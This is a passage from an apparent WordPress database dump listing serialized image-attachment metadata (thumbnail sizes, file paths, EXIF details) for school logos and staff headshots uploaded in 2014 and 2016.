355599_1266335763427202_8553129621538361413_n-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:59:\"15355599_1266335763427202_8553129621538361413_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:59:\"15355599_1266335763427202_8553129621538361413_n-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2931,699,'_wp_attached_file','2014/12/howard-county-public-schools-squarelogo.png'),(2932,699,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:140;s:4:\"file\";s:51:\"2014/12/howard-county-public-schools-squarelogo.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:51:\"howard-county-public-schools-squarelogo-150x140.png\";s:5:\"width\";i:150;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:51:\"howard-county-public-schools-squarelogo-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:51:\"howard-county-public-schools-squarelogo-180x140.png\";s:5:\"width\";i:180;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2952,709,'_wp_attached_file','2016/12/Ava1-700x933.jpg'),(2953,709,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:933;s:4:\"file\";s:24:\"2016/12/Ava1-700x933.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Ava1-700x933-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Ava1-700x933-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"Ava1-700x933-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:24:\"Ava1-700x933-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:24:\"Ava1-700x933-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:24:\"Ava1-700x933-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Ava1-700x933-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"Ava1-700x933-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"Ava1-700x933-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 5c\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1431780386\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.12\";s:3:\"iso\";s:2:\"64\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2950,708,'_wp_attached_file','2016/12/BarbaraGreene.jpg'),(2951,708,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:100;s:6:\"height\";i:100;s:4:\"file\";s:25:\"2016/12/BarbaraGreene.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2933,699,'_edit_lock','1482025648:1'),(2934,700,'_wp_attached_file','2014/12/Howard-County-Public-Schools.jpg'),(2935,700,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:855;s:6:\"height\";i:503;s:4:\"file\";s:40:\"2014/12/Howard-County-Public-Schools.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"Howard-County-Public-Schools-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"Howard-County-Public-Schools-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"Howard-County-Public-Schools-768x452.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:452;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:40:\"Howard-County-Public-Schools-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:40:\"Howard-County-Public-Schools-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:40:\"Howard-County-Public-Schools-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:40:\"Howard-County-Public-Schools-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:40:\"Howard-County-Public-Schools-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:40:\"Howard-County-Public-Schools-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:40:\"Howard-County-Public-Schools-600x503.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:503;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2936,701,'_wp_attached_file','2014/12/c22ed1_fce06e018b8341988035fed2cc2f7251.png'),(2937,701,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:263;s:6:\"height\";i:96;s:4:\"file\";s:51:\"2014/12/c22ed1_fce06e018b8341988035fed2cc2f7251.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:50:\"c22ed1_fce06e018b8341988035fed2cc2f7251-150x96.png\";s:5:\"width\";i:150;s:6:\"height\";i:96;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:50:\"c22ed1_fce06e018b8341988035fed2cc2f7251-180x96.png\";s:5:\"width\";i:180;s:6:\"height\";i:96;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:50:\"c22ed1_fce06e018b8341988035fed2cc2f7251-180x96.png\";s:5:\"width\";i:180;s:6:\"height\";i:96;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2938,702,'_wp_attached_file','2014/12/imgres.png'),(2939,702,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:280;s:6:\"height\";i:180;s:4:\"file\";s:18:\"2014/12/imgres.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"imgres-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:18:\"imgres-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"imgres-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2940,703,'_wp_attached_file','2014/12/th-6.jpg'),(2941,703,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:173;s:6:\"height\";i:162;s:4:\"file\";s:16:\"2014/12/th-6.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"th-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:16:\"th-6-173x110.jpg\";s:5:\"width\";i:173;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2942,704,'_wp_attached_file','2014/12/th-7.jpg'),(2943,704,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:163;s:6:\"height\";i:162;s:4:\"file\";s:16:\"2014/12/th-7.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"th-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:16:\"th-7-163x110.jpg\";s:5:\"width\";i:163;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2944,705,'_wp_attached_file','2014/12/imgres-1.png'),(2945,705,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:213;s:6:\"height\";i:237;s:4:\"file\";s:20:\"2014/12/imgres-1.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"imgres-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"imgres-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"imgres-1-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2946,706,'_wp_attached_file','2016/12/TamikaDaniel.jpg'),(2947,706,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:100;s:6:\"height\";i:100;s:4:\"file\";s:24:\"2016/12/TamikaDaniel.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2948,707,'_wp_attached_file','2016/12/Christy-Lewis.jpg'),(2949,707,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:753;s:4:\"file\";s:25:\"2016/12/Christy-Lewis.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Christy-Lewis-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Christy-Lewis-279x300.jpg\";s:5:\"width\";i:279;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"Christy-Lewis-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:25:\"Christy-Lewis-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:25:\"Christy-Lewis-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:25:\"Christy-Lewis-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"Christy-Lewis-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"Christy-Lewis-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"Christy-Lewis-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2955,710,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:791;s:4:\"file\";s:26:\"2016/12/Cassie-700x791.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Cassie-700x791-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Cassie-700x791-265x300.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"Cassie-700x791-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:26:\"Cassie-700x791-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:26:\"Cassie-700x791-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:26:\"Cassie-700x791-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Cassie-700x791-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Cassie-700x791-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"Cassie-700x791-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 5c\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1431780527\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.12\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2956,711,'_wp_attached_file','2016/12/ChericeDaniel-in-white.jpg'),(2957,711,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:100;s:6:\"height\";i:100;s:4:\"file\";s:34:\"2016/12/ChericeDaniel-in-white.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2960,713,'_wp_attached_file','2016/12/CKinder1-e1482292246170.jpg'),(2961,713,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:251;s:4:\"file\";s:35:\"2016/12/CKinder1-e1482292246170.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"CKinder1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"CKinder1-239x300.jpg\";s:5:\"width\";i:239;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"CKinder1-336x400.jpg\";s:5:\"width\";i:336;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"CKinder1-336x300.jpg\";s:5:\"width\";i:336;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"CKinder1-336x300.jpg\";s:5:\"width\";i:336;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"CKinder1-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"CKinder1-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"CKinder1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:19:\"Canon EOS REBEL T3i\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1449248772\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"49\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2962,714,'_wp_attached_file','2016/12/Crystal-Whitaker-e1482292405568.jpg'),(2963,714,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:201;s:4:\"file\";s:43:\"2016/12/Crystal-Whitaker-e1482292405568.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Crystal-Whitaker-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Crystal-Whitaker-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"Crystal-Whitaker-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:28:\"Crystal-Whitaker-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:28:\"Crystal-Whitaker-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:28:\"Crystal-Whitaker-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"Crystal-Whitaker-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"Crystal-Whitaker-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"Crystal-Whitaker-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2964,715,'_wp_attached_file','2016/12/dawnkempweb-e1484268899215.jpg'),(2965,715,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:178;s:6:\"height\";i:188;s:4:\"file\";s:38:\"2016/12/dawnkempweb-e1484268899215.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"dawnkempweb-e1484268899215-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"dawnkempweb-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"dawnkempweb-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:23:\"dawnkempweb-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:23:\"dawnkempweb-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:38:\"dawnkempweb-e1484268899215-178x110.jpg\";s:5:\"width\";i:178;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:38:\"dawnkempweb-e1484268899215-178x180.jpg\";s:5:\"width\";i:178;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"dawnkempweb-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"dawnkempweb-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0